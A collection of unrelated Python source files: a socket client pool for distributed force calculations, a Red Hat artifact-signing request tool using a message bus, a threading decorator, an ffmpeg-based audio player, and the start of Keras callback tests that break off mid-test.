info(" @SOCKET: Client asked for connection from "+ str( address ) +". Now hand-shaking.", verbosity.low)
driver.poll()
if (driver.status | Status.Up):
self.clients.append(driver)
info(" @SOCKET: Handshaking was successful. Added to the client list.", verbosity.low)
else:
warning(" @SOCKET: Handshaking failed. Dropping connection.", verbosity.low)
client.shutdown(socket.SHUT_RDWR)
client.close()
else:
keepsearch = False
def pool_distribute(self):
"""Deals with keeping the list of jobs up-to-date during a force
calculation step.
Deals with maintaining the jobs list. Gets data from drivers that have
finished their calculation and removes that job from the list of running
jobs, adds jobs to free clients and initialises the forcefields of new
clients.
"""
for c in self.clients:
if c.status == Status.Disconnected : # client disconnected. force a pool_update
self._poll_iter = UPDATEFREQ
return
if not c.status & ( Status.Ready | Status.NeedsInit ):
c.poll()
for [r,c] in self.jobs[:]:
if c.status & Status.HasData:
try:
r["result"] = c.getforce()
if len(r["result"][1]) != len(r["pos"]):
raise InvalidSize
except Disconnected:
c.status = Status.Disconnected
continue
except InvalidSize:
warning(" @SOCKET: Client returned an inconsistent number of forces. Will mark as disconnected and try to carry on.", verbosity.low)
c.status = Status.Disconnected
continue
except:
warning(" @SOCKET: Client got in a awkward state during getforce. Will mark as disconnected and try to carry on.", verbosity.low)
c.status = Status.Disconnected
continue
c.poll()
while c.status & Status.Busy: # waits, but check if we got stuck.
if self.timeout > 0 and r["start"] > 0 and time.time() - r["start"] > self.timeout:
warning(" @SOCKET: Timeout! HASDATA for bead " + str(r["id"]) + " has been running for " + str(time.time() - r["start"]) + " sec.", verbosity.low)
warning(" @SOCKET: Client " + str(c.peername) + " died or got unresponsive(A). Disconnecting.", verbosity.low)
try:
c.shutdown(socket.SHUT_RDWR)
except:
pass
c.close()
c.status = Status.Disconnected
continue
c.poll()
if not (c.status & Status.Up):
warning(" @SOCKET: Client died a horrible death while getting forces. Will try to cleanup.", verbosity.low)
continue
r["status"] = "Done"
c.lastreq = r["id"] # saves the ID of the request that the client has just processed
self.jobs = [ w for w in self.jobs if not ( w[0] is r and w[1] is c ) ] # removes pair in a robust way
if self.timeout > 0 and c.status != Status.Disconnected and r["start"] > 0 and time.time() - r["start"] > self.timeout:
warning(" @SOCKET: Timeout! Request for bead " + str( r["id"]) + " has been running for " + str(time.time() - r["start"]) + " sec.", verbosity.low)
warning(" @SOCKET: Client " + str(c.peername) + " died or got unresponsive(B). Disconnecting.",verbosity.low)
try:
c.shutdown(socket.SHUT_RDWR)
except socket.error:
e = sys.exc_info()
warning(" @SOCKET: could not shut down cleanly the socket. %s: %s in file '%s' on line %d" % (e[0].__name__, e[1], os.path.basename(e[2].tb_frame.f_code.co_filename), e[2].tb_lineno), verbosity.low )
c.close()
c.poll()
c.status = Status.Disconnected
freec = self.clients[:]
for [r2, c] in self.jobs:
freec.remove(c)
pendr = self.requests[:]
pendr = [ r for r in self.requests if r["status"] == "Queued" ]
for fc in freec[:]:
matched = False
# first, makes sure that the client is REALLY free
if not (fc.status & Status.Up):
self.clients.remove(fc) # if fc is in freec it can't be associated with a job (we just checked for that above)
continue
if fc.status & Status.HasData:
continue
if not (fc.status & (Status.Ready | Status.NeedsInit | Status.Busy) ):
warning(" @SOCKET: Client " + str(fc.peername) + " is in an unexpected status " + str(fc.status) + " at (1). Will try to keep calm and carry on.", verbosity.low)
continue
for match_ids in ( "match", "none", "free", "any" ):
for r in pendr[:]:
if match_ids == "match" and not fc.lastreq is r["id"]:
continue
elif match_ids == "none" and not fc.lastreq is None:
continue
elif match_ids == "free" and fc.locked:
continue
info(" @SOCKET: Assigning [%5s] request id %4s to client with last-id %4s (% 3d/% 3d : %s)" % (match_ids, str(r["id"]), str(fc.lastreq), self.clients.index(fc), len(self.clients), str(fc.peername) ), verbosity.high )
while fc.status & Status.Busy:
fc.poll()
if fc.status & Status.NeedsInit:
fc.initialize(r["id"], r["pars"])
fc.poll()
while fc.status & Status.Busy: # waits for initialization to finish. hopefully this is fast
fc.poll()
if fc.status & Status.Ready:
fc.sendpos(r["pos"], r["cell"])
r["status"] = "Running"
r["start"] = time.time() # sets start time for the request
fc.poll()
self.jobs.append([r,fc])
fc.locked = (fc.lastreq is r["id"])
matched = True
# removes r from the list of pending jobs
pendr = [nr for nr in pendr if (not nr is r)]
break
else:
warning(" @SOCKET: Client " + str(fc.peername) + " is in an unexpected status " + str(fc.status) + " at (2). Will try to keep calm and carry on.", verbosity.low)
if matched:
break # doesn't do a second (or third) round if it managed
# to assign the job
def _kill_handler(self, signal, frame):
"""Deals with handling a kill call gracefully.
Prevents any of the threads becoming zombies, by intercepting a
kill signal using the standard python function signal.signal() and
then closing the socket and the spawned threads before closing the main
thread. Called when signals SIG_INT and SIG_TERM are received.
Args:
signal: An integer giving the signal number of the signal received
from the socket.
frame: Current stack frame.
"""
warning(" @SOCKET: Kill signal. Trying to make a clean exit.", verbosity.low)
self.end_thread()
softexit.trigger(" @SOCKET: Kill signal received")
try:
self.__del__()
except:
pass
if signal in self._prev_kill:
self._prev_kill[signal](signal, frame)
def _poll_loop(self):
"""The main thread loop.
Runs until either the program finishes or a kill call is sent. Updates
the pool of clients every UPDATEFREQ loops and loops every latency
seconds until _poll_true becomes false.
"""
info(" @SOCKET: Starting the polling thread main loop.", verbosity.low)
self._poll_iter = UPDATEFREQ
while self._poll_true:
time.sleep(self.latency)
# makes sure to remove the last dead client as soon as possible -- and to get clients if we are dry
if self._poll_iter >= UPDATEFREQ or len(self.clients)==0 or (len(self.clients) > 0 and not(self.clients[0].status & Status.Up)):
self.pool_update()
self._poll_iter = 0
self._poll_iter += 1
self.pool_distribute()
if os.path.exists("EXIT"): # softexit
info(" @SOCKET: Soft exit request from file EXIT. Flushing job queue.", verbosity.low)
# releases all pending requests
for r in self.requests:
r["status"] = "Exit"
for c in self.clients:
try:
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
# flush it all down the drain
self.clients = []
self.jobs = []
self._poll_thread = None
def started(self):
"""Returns a boolean specifying whether the thread has started yet."""
return (not self._poll_thread is None)
def start_thread(self):
"""Spawns a new thread.
Splits the main program into two threads, one that runs the polling loop
which updates the client list, and one which gets the data. Also sets up
the machinery to deal with a kill call, in the case of a Ctrl-C or
similar signal the signal is intercepted by the _kill_handler function,
which cleans up the spawned thread before closing the main thread.
Raises:
NameError: Raised if the polling thread already exists.
"""
self.open()
if not self._poll_thread is None:
raise NameError("Polling thread already started")
self._poll_thread = threading.Thread(target=self._poll_loop, name="poll_" + self.address)
self._poll_thread.daemon = True
self._prev_kill[signal.SIGINT] = signal.signal(signal.SIGINT, self._kill_handler)
self._prev_kill[signal.SIGTERM] = signal.signal(signal.SIGTERM, self._kill_handler)
self._poll_true = True
self._poll_thread.start()
def end_thread(self):
"""Closes the spawned thread.
Deals with cleaning up the spawned thread cleanly. First sets
_poll_true to false to indicate that the poll_loop should be exited, then
closes the spawned thread and removes it.
"""
self._poll_true = False
if not self._poll_thread is None:
self._poll_thread.join()
self._poll_thread = None
self.close()
|
umb_producer.py
|
#!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker03.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker04.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker03.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker04.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker03.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker03.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
"""Determine the quay destination tag where a release image lives, based on the
release name and arch (since we can now have multiple arches for each release name)
- make sure it includes the arch in the tag to distinguish from any other releases of same name.
e.g.:
(4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
(4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
"""
return release_name if arch in release_name else "{}-{}".format(release_name, arch)
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
help="The user who requested the signature")
product = click.option("--product", required=True,
type=click.Choice(["openshift", "rhcos"]),
help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
help="Unique build job identifier for this signing request, "
"use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
type=click.Choice(['test', 'redhatrelease2', 'beta2']),
help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
type=click.Choice(['x86_64', 'ppc64le', 's390x']),
help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
help="What repo is this image for?")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
type=click.Path(exists=True),
help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
type=click.Path(exists=True),
help="Path to the client key for UMB authentication")
env_click_obj = click.option("--env", required=False, metavar="ENVIRONMENT",
default='stage',
type=click.Choice(['dev', 'stage', 'prod']),
help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
help="If given, DO NOT request signature, "
"show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
default=DEFAULT_CA_CHAIN,
help="Manually specify the path to the RHIT CA Trust Chain. "
"Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
env_value = None # Will be set to value of click_env_obj parameter
@click.group(context_settings=context_settings)
def cli(**kwargs):
"""Helper utility for internal Red Hat use ONLY. Use in a build job to
request signatures for various artifacts produced as part of an
Openshift 4.x release. Signatures are requested by sending a JSON blob
over the Universal Message Bus to the 'robosignatory' (RADAS).
You may override the default path to look for the Red Hat IT
Certificate Authority trust chain by using the --ca-certs option in
the global context (before the sub-command).
"""
pass
######################################################################
# Helpers
def get_digest_base64(location):
"""Download the sha256sum.txt message digest file at the given
`location`.
:return: A `string` of the base64-encoded message digest
"""
res = requests.get(location,
verify=ssl.get_default_verify_paths().openssl_cafile)
if res.status_code == 200:
# b64encode needs a bytes type input, use the dedicated
# 'encode' method to turn str=>bytes. The result of
# `b64encode` is a bytes type. Later when we go to serialize
# this with json it needs to be a str type so we will decode
# the bytes=>str now.
return base64.b64encode(res.text.encode()).decode()
else:
raise(Exception(res.reason))
def presend_validation(message):
"""Verify the message we want to send over the bus has all the
required fields
"""
for field in SIGN_REQUEST_MESSAGE_FIELDS:
if field not in message:
return field
return True
def oc_image_info(pullspec):
"""Get metadata for an image at the given `pullspec`
:return: a dict with the serialzed JSON from the 'oc image info'
call
"""
image_info_raw = subprocess.check_output(
['oc', 'image', 'info', '-o', 'json', pullspec])
return json.loads(image_info_raw)
def get_bus_producer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a producer. We're going to
need this in multiple places so we want to ensure we do it the
same way each time.
"""
return AMQProducer(urls=URLS[env or 'stage'],
certificate=certificate,
private_key=private_key,
trusted_certificates=trusted_certificates,
topic=TOPIC)
def producer_thread(producer, args):
print(args)
producer.send_msg(*args)
def producer_send_msg(producer, *args):
t = threading.Thread(target=producer_thread, args=(producer, args))
t.start()
t.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a consumer. We're going to
do need this in multiple places though, so we want to ensure we do it
the same way each time.
"""
return AMQConsumer(urls=URLS[env or 'stage'], certificate=certificate,
private_key=private_key, trusted_certificates=trusted_certificates)
def art_consumer_callback(msg, notsure):
"""`msg` is a `Message` object which has various attributes. Such as `body`.
`notsure` I am not sure what that is. I only got as far as knowing
this callback requires two parameters.
"""
print(msg)
body = json.loads(msg.body)
print(json.dumps(body, indent=4))
if body['msg']['signing_status'] != 'success':
print("ERROR: robosignatory failed to sign artifact")
exit(1)
else:
# example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
result = body['msg']['signed_artifact']
out_file = body['msg']['artifact_meta']['name']
with open(out_file, 'w') as fp:
fp.write(base64.decodestring(result))
fp.flush()
print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
return True
def consumer_thread(consumer):
global env_value
if not env_value:
raise ValueError('env_value has not been set yet.')
consumer.consume(ART_CONSUMER.format(env=env_value), art_consumer_callback)
def consumer_start(consumer):
t = threading.Thread(target=consumer_thread, args=(consumer,))
t.start()
return t
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
producer = get_bus_producer(env, certificate, private_key, trusted_certificates)
consumer = get_bus_consumer(env, certificate, private_key, trusted_certificates)
return (producer, consumer)
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env_click_obj
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, arch):
"""Sign a 'message digest'. These are sha256sum.txt files produced by
the 'sha256sum` command (hence the strange command name). In the ART
world, this is for signing message digests from extracting OpenShift
tools, as well as RHCOS bare-betal message digests.
"""
global env_value
env_value = env
if product == 'openshift':
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name=release_name,
release_stage=client_type)
elif product == 'rhcos':
release_parts = release_name.split('.')
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name_xy='.'.join(release_parts[:2]),
release_name=release_name)
artifact = get_digest_base64(artifact_url)
message = {
"artifact": artifact,
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": "sha256sum.txt.gpg",
"type": "message-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env_click_obj
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, digest, arch):
"""Sign a 'json digest'. These are JSON blobs that associate a
pullspec with a sha256 digest. In the ART world, this is for "signing
payload images". After the json digest is signed we publish the
signature in a location which follows a specific directory pattern,
thus allowing the signature to be looked up programmatically.
"""
global env_value
env_value = env
json_claim = {
"critical": {
"image": {
"docker-manifest-digest": None
},
"type": "atomic container signature",
"identity": {
"docker-reference": None,
}
},
"optional": {
"creator": "Red Hat OpenShift Signing Authority 0.0.1",
},
}
release_stage = client_type
release_tag = release_name
pullspec = "registry.redhat.io/rh-acs/{}:{}".format(release_stage, release_tag)
json_claim['critical']['identity']['docker-reference'] = pullspec
if not digest:
digest = oc_image_info(pullspec)['digest']
json_claim['critical']['image']['docker-manifest-digest'] = digest
print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
print(json.dumps(json_claim, indent=4))
message = {
"artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
"type": "json-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
if __name__ == '__main__':
cli()
|
decorators.py
|
''' Holds decorators for use in api '''
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
audio.py
|
import os
import wave
from multiprocessing import Process
import pyaudio
class Audio:
def __init__(self, video_path):
audio_path = os.path.splitext(video_path)[0] + ".wav"
if not os.path.exists(audio_path):
os.system("ffmpeg -i " + video_path + " -b:a 128k " + audio_path)
self.audio_thread = Process(target=self.playAudioThread, args=(audio_path,))
self.audio_thread.daemon = True
def playAudioThread(self, audio_path):
chunk = 1024
wf = wave.open(audio_path, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
while True:
audio_data = wf.readframes(chunk)
if audio_data == "": break;
stream.write(audio_data)
def start(self):
self.audio_thread.start()
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def _run_load_weights_on_restart_test_common_iterations(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
filepath = os.path.join(self.get_temp_dir(), 'checkpoint.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
model.fit(
train_ds,
epochs=3,
callbacks=[
